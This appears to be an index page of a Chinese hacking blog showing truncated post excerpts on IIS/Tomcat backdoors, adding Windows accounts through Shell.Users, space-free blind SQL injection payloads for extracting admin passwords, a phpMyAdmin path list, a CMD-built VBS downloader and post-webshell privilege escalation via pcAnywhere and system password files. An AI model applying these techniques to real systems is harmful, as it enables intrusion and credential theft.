预览模式: 普通 | 列表

教你如何用Iis留后门(图)

公司邮件服务器用的jsp+mysql,windows上必然要用到tomcat。然而tomcat安装以后在windows上默认是system权限,只要得到一个shell,服务器就搞定。所以在服务里面采取了降权的手法,让tomcat服务,以单独账户运行,防止webshell提权
  


想到tomcat权限如此之大,我们是否可以借鉴tomcat这种方式留系统后门呢?

查看更多...

分类:技术文章 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 3

命令行下一种新的加帐号的方法

作者:lcx

今天研究了一下用户控制面板文件nusrmgr.cpl,发现调用的是Shell.Users来加用户,它还同时调用了 wscript.shell、Shell.Application、Shell.LocalMachine这三个组件。不过加用户的话,这一个 Shell.Users就足够了。那么可能在删掉了net.exe和不用adsi之外,这也可能是一种新的加用户的方法。代码如下:

js:

查看更多...

分类:技术文章 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 3

利用“()”绕过空格继续注射

举个例 子说一下,我们得到一个注入点:jmdcw.asp?name=aa'and 1=1 and ''=',如果替换其中的1=1为查询管理员的密码的语句:
(select asc(mid(pass,1,1)) from [name] where id=1)>49如何用空格呢?其实可以写成这样的:
jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]where(id=1))>49)and''='
如果屏蔽了符号,则用between…and…,语句是:
jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]where(id=1))between(40)and(50))and''='

查看更多...

分类:技术文章 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 3
程序代码 程序代码
<?php

$list = array(
'/phpmyadmin/',
'/phpMyAdmin/',

查看更多...

分类:漏洞相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 5

BHST文章系统漏洞

作者:Jshell
Blog:http://www.jshell.cn
发布于鸡拔毛IT潮人社区
http://www.jbmao.com
首先说下作者在程序中代码的顺序错误

查看更多...

分类:漏洞相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 8

CMD下执行VBS下载脚本

在CMD中一条一条地敲如下语句:
echo Set xPost = CreateObject("Microsoft.XMLHTTP") >down.vbs
echo xPost.Open "GET","http://www.baidu.com/img/logo.gif",0 >>down.vbs
echo xPost.Send() >>down.vbs
echo Set sGet = CreateObject("ADODB.Stream") >>down.vbs

查看更多...

分类:技术文章 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 9

提升(web)权限终极9技巧

当我们取得一个webshell时候,下一部要做的就是提升权限  
个人总结如下:  
1:   C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\  
看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,得到pcAnywhere密码,登陆  
2.C:\WINNT\system32\config\  

查看更多...

分类:技术文章 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 14

便宜企业网V1.0漏洞分析

QQ:7958600

products.asp 部分代码

<%

查看更多...

分类:漏洞相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 17